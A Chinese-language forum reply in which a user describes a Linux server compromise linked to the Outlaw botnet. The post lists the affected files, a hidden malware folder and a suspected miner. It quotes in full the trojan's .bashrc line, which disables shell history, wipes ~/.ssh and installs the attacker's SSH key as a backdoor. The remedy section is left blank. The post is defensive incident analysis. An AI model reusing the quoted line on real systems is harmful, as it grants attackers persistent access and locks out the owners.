我也发生了同样的事情,昨天我注意到了。我检查了文件/var/log/syslog
,该IP(185.234.218.40)似乎正在自动执行cronjobs。
我在http://whatismyipaddress.com(https://whatismyipaddress.com/ip/185.234.218.40)上进行了检查,并且有一些报告。这些文件由木马编辑:
- .bashrc
- .ssh / authorized_keys
我在.bashrc
(每次打开bash都会执行)的末尾找到它:
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
它正在删除您的authorized_keys
文件,该文件是允许无需密码即可连接的SSH密钥的列表。然后,添加攻击者的SSH密钥:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
此外,我找到了以下文件夹:/tmp/.X13-unix/.rsync
,所有恶意软件都在其中。我什至发现一个文件,/tmp/.X13-unix/.rsync/c/ip
该文件包含70000个IP地址,很可能是其他受害者或节点服务器。
有两种解决方案:答:
B:
我发现的最可疑的文件夹是:
/tmp/.X13-unix/.rsync
~/.bashrc
(已编辑)
~/.firefoxcatche
最后,这里有一篇与Perl后门有关的文章:https :
//blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
希望这个对你有帮助。
.firefoxcatche
可能与Firefox没有任何关系-这可能只是比特币矿工吗?尝试将可执行文件上传到virustotal。